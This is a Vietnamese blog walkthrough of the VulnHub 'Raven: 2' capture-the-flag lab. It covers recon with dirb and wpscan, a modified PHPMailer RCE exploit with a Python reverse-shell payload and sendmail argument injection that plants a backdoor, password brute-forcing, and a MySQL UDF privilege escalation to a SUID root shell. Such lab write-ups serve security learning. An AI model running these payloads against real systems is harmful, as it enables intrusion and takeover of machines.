Mở đầu

 • Dạo này mình rất có hứng thú với mấy bài lab trên VulnHub.com. Lần này lại là một bài nữa, có thể chọc ngoáy khá nhiều vấn đề ở bài này. Bạn nào muốn build lên làm thử thì qua link này Raven: 2
 • Thôi thì bắt đầu vào chiến thôi. Bài này có tất cả là 4 cờ. Mình đi theo hướng tìm lần lượt 4 cờ luôn nhé.

Tấn công

 • Bắt đầu thì vẫn công việc quen thuộc quét nmap các thứ thì giống các bài lab trước đó của mình nhé.
 • Quét được địa chỉ ip của nó là http://192.168.19.17/, mở ra xem có gì không nào.

 • Hừm :anguished: chả có gì, thôi quét xem có thư mục nào là lạ k. Quét bằng dirb thì có chỗ này cần lưu ý nè
  1
  2
  3
  4
  5
  
  ---- Entering directory: http://192.168.19.17/vendor/ ----
  (!) WARNING: Directory IS LISTABLE. No need to scan it.            
    (Use mode '-w' if you want to scan it anyway)
  
  ---- Entering directory: http://192.168.19.17/wordpress/ ----
  
 • Thử vào http://192.168.19.17/vendor/ thì

 • Cờ thứ nhất ở /PATH/ nha =))

 • Sau một hồi đọc các file trong /vendor/ thì biết được trang này sử dụng PHPMailer phiên bản 5.2.16. Các bạn có thể kiểm tra ở file VERSION ở /vendor/ kia kìa :D

 • Sử dụng exploit này :D PHPMailer < 5.2.18 - Remote Code Execution (Python)

 • Nhưng mà cần sửa sang lại một chút.

  1
  2
  3
  4
  5
  6
  7
  8
  
  target = 'http://192.168.19.17/contact.php'
  backdoor = '/backdoor.php'
  
  payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.19.100\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
  fields={'action': 'submit',
      'name': payload,
      'email': '"minhtuan\\\" -OQueueDirectory=/tmp -X/var/www/html/backdoor.php hacker\" @gmail.com',
      'message': 'Pwned'}
  
 • Run lên thôi. Kết quả sẽ như này

 • Ở bên máy mình mở nc -lvp 4444 rồi qua trình duyệt vào http://192.168.19.17/backdoor.php. Ta đã remote được rồi :D

 • Thêm python -c 'import pty;pty.spawn("/bin/bash")' đọc cho dễ :D

 • Flag2 nằm ở thư mục /var/www/flag2.txt flag2{6a8ed560f0b5358ecf844108048eb337}

 • Tiếp tục tìm đến flag3. Thực ra là flag3 này mình tìm thấy đầu tiên luôn, trước cả flag1. Các bạn còn nhớ đến cái link http://192.168.19.17/wordpress/ mà vừa nãy quét được bằng dirb không. Vào trang đấy thì chưa thấy có css. Thử bấm nút search thì ra link http://raven.local/wordpress/?s=.

 • Sử dụng câu lệnh terminal sudo echo "192.168.19.17 raven.local" > /etc/hosts rồi vào http://raven.local/wordpress.

 • Đẹp đẽ hơn tý rồi. Sử dụng wpscan có sẵn trên kali linux để quét xem trang có dính gì không.
  1
  2
  3
  
  [+] Upload directory has listing enabled: http://raven.local/wordpress/wp-content/uploads/
  | Found By: Direct Access (Aggressive Detection)
  | Confidence: 100%
  
 • Quét thấy trang này khả thi tý tý :v, vào thì hơi bất ngờ xíu :v

 • Flag3 đây rồi. Mình kiếm được vài thứ nữa :v
   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  
  [+] michael
  | Detected By: Author Posts - Author Pattern (Passive Detection)
  | Confirmed By:
  | Rss Generator (Passive Detection)
  | Wp Json Api (Aggressive Detection)
  |  - http://raven.local/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
  | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  | Login Error Messages (Aggressive Detection)
  
  [+] steven
  | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  | Confirmed By: Login Error Messages (Aggressive Detection)
  
 • Sử dụng wpscan brute force được mật khẩu của stevenLOLLOL1. Nhưng thôi, đến đây đã, quay lại cái remote shell kia thôi :D. (Thực ra mình lấy được mật khẩu, đang sung sướng ssh đến thằng steven nhưng đếu được :()
  1
  2
  3
  4
  5
  6
  
  www-data@Raven:/var/www$ ps uax | grep mysql
  ps uax | grep mysql
  root    543 0.0 0.1  4340 1608 ?    S  Jun20  0:00 /bin/sh /usr/bin/mysqld_safe
  root    909 0.0 5.1 816988 52956 ?    Sl  Jun20  0:08 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
  www-data 1783 0.0 0.0 11136  984 pts/4  S+  01:26  0:00 grep mysql
  www-data@Raven:/var/www$ 
  
 • Thấy được là mysql đang chạy ở quyền root. Thử tìm kiếm mấy cái exploit thì kiếm được cái này https://www.exploit-db.com/exploits/46249
 • wget https://www.exploit-db.com/download/46249 sử dụng câu lệnh này tải exploit này về rồi đổi tên thành 46249.py

 • À nó yêu cầu username và password của mysql, trong thằng wordpress này có file wp-config.php ở thư mục /wordpress/. Vào đọc thì biết được username:password là root:R@v3nSecurity. Có đủ thứ mình cần rồi. Chạy thử cái coi sao.
   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  
  www-data@Raven:/var/www/html$ python 46249.py --username root --password R@v3nSecurity
  <l$ python 46249.py --username root --password R@v3nSecurity         
  Plugin dir is /usr/lib/mysql/plugin/
  Trying to create a udf library...
  UDF library crated successfully: /usr/lib/mysql/plugin/udf9609.so
  Trying to create sys_exec...
  ERROR 1125 (HY000) at line 1: Function 'sys_exec' already exists
  Checking if sys_exec was crated...
  sys_exec was found: *************************** 1. row ***************************
  name: sys_exec
  ret: 2
  dl: udf5766.so
  type: function
  
  Generating a suid binary in /tmp/sh...
  +-------------------------------------------------------------------------+
  | sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh') |
  +-------------------------------------------------------------------------+
  |                                    0 |
  +-------------------------------------------------------------------------+
  Trying to spawn a root shell...
  # 
  
  1
  2
  3
  4
  
  # whoami
  whoami
  root
  # 
  
 • Ấy chà chà, có root rồi, vào /root lấy nốt cái flag cuối thôi :3
   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  
  # cd /root
  cd /root
  # ls
  ls
  flag4.txt
  # cat flag4.txt
  cat flag4.txt
  ___          ___ ___ 
  | _ \__ ___ _____ _ _ |_ _|_ _|
  |  / _` \ V / -_) ' \ | | | | 
  |_|_\__,_|\_/\___|_||_|___|___|
  
  flag4{df2bc5e951d91581467bb9a2a8ff4425}
  
  CONGRATULATIONS on successfully rooting RavenII
  
  I hope you enjoyed this second interation of the Raven VM
  
  Hit me up on Twitter and let me know what you thought: 
  
  @mccannwj / wjmccann.github.io
  # 
  

Tổng kết

 • Bài này khá là thú vị, nó chạy nhiều thứ trên con web này, phần cũng để đánh lừa, phần cũng để mình mất thời gian hơn. Nhưng đây là một trải nghiệm khá thú vị :D. Chúc các bạn thành công :v
 • Cảm ơn anh @vigov5 đã cướp giúp em quả flag cuối =))